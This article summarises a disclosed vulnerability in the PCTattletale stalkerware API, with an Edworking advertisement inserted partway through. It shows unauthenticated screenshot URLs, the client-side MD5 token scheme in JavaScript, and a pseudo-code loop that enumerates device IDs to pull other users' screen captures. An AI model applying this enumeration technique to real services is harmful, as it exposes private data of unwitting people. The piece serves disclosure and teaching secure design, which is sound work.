PCTattletale is a stalkerware app that monitors devices by securing user permissions to record screen captures. It supports both Android and Windows systems. Once installed, the app sends these recordings to an online portal where they can be accessed via the observer's browser.
A recent discovery revealed a significant vulnerability in the PCTattletale's API, making it possible for attackers to obtain the latest screen captures from any device using the application. This vulnerability is different from the previously reported Insecure Direct Object References (IDOR) vulnerability discovered by Jo Coscia and covered by TechCrunch journalist Zack Whittaker.
This summary details the steps typically involved in exploiting the vulnerability, including:
Setting up an account.
Installation of the app on a target device.
Retrieving screen captures from different devices.
Script creation to exploit the vulnerability effectively.
Part 0: Setup
To begin, an account is created on the PCTattletale website, generating an API key. After account creation, an APK is installed on the target device.
```HTTP
METHOD: POST
URL: https://p200wi0b00.execute-api.us-east-2.amazonaws.com/Prod/api/pctt/member/
Sample headers and response showing initial account setup including the API key.
Part 1: Screenshot IDOR
For each device connected, a thumbnail of the screen capture is displayed. By exploring this thumbnail, it becomes evident that the app retrieves screenshots through insecure direct object references.
Method to Retrieve Screen Captures
```HTTP
METHOD: GET
URL: https://pctattletalev2.s3-accelerate.amazonaws.com/{deviceID}/{date}/{timestamp}.jpg
No authentication is required for this access, making it a straightforward IDOR.
Part 2: Finding the Latest Screenshot
Upon accessing the device overview, the latest screenshot is displayed as a thumbnail image, indicating the capture can be retrieved through a specific POST request to the API.
```HTTP
METHOD: POST
URL: https://5uw7yeva9g.execute-api.us-east-2.amazonaws.com/Prod/api/pctt/member/{APIKey}/{deviceID}/Live/
Request containing a token and response providing the most recent screenshot URL.
Part 3: Client-Side Token Generation
The token used in API requests is generated on the client side by appending the device ID to the API key and running it through the MD5 hashing algorithm. This discovery allows an attacker to recreate valid tokens for unauthorized devices.
Token Generation Code
```javascript
function updateDevice(device, index) {
var deviceToken = md5(API_KEY + "" + device.DeviceID);
$.ajax({
method: "POST",
crossDomain: true,
contentType: "application/json",
dataType: "json",
url: AWS_BASE_URL_LIVE + "api/pctt/member/" + API_KEY + "/" + device.DeviceID + "/Live/",
data: JSON.stringify({Token: deviceToken})
});
}
Part 4: Exploiting Faith
An attempt to use a generated token with an adjacent device ID confirms that the system permits access to any device, underscoring the lack of secure validation.
Part 5: Putting Together an Exploit Script
By utilizing the client-side token generation discovery and API access paths, an automated script can be developed to exploit this vulnerability systematically and retrieve screen captures.
```python
Sample pseudo code for exploit script
for device_id in range(valid_start, valid_end):
screenshot = requests.get(screenshot_url.format(device_id))
if valid_response(screenshot):
save_screenshot(screenshot)
Edworking is the best and smartest decision for SMEs and startups to be more productive. Edworking is a FREE superapp of productivity that includes all you need for work powered by AI in the same superapp, connecting Task Management, Docs, Chat, Videocall, and File Management. Save money today by not paying for Slack, Trello, Dropbox, Zoom, and Notion.
Part 6: Aftermath
Following the exposure of the vulnerability, scrutiny intensified leading to the blocking of the entire PCTattletale AWS infrastructure by Amazon. Further details are available on maia arson crimew's blog with technical appendices explaining the exploit in detail.
Remember these 3 key ideas for your startup:
Emphasize Security: Always prioritize secure development practices and regular audits to avoid vulnerabilities that could compromise user data.
Rapid Response: Be proactive in responding to vulnerabilities reported by researchers to maintain credibility and user trust.
Client-Side Validation: Avoid client-side token generation for critical application features; always use secure server-side validation.
For more details, see the original source
Security vulnerability word cloud highlighting critical areas.
Implementing these strategies can ensure the integrity, trust, and robustness of your tech solutions. Stay informed and updated to shield your startup from potential security threats.
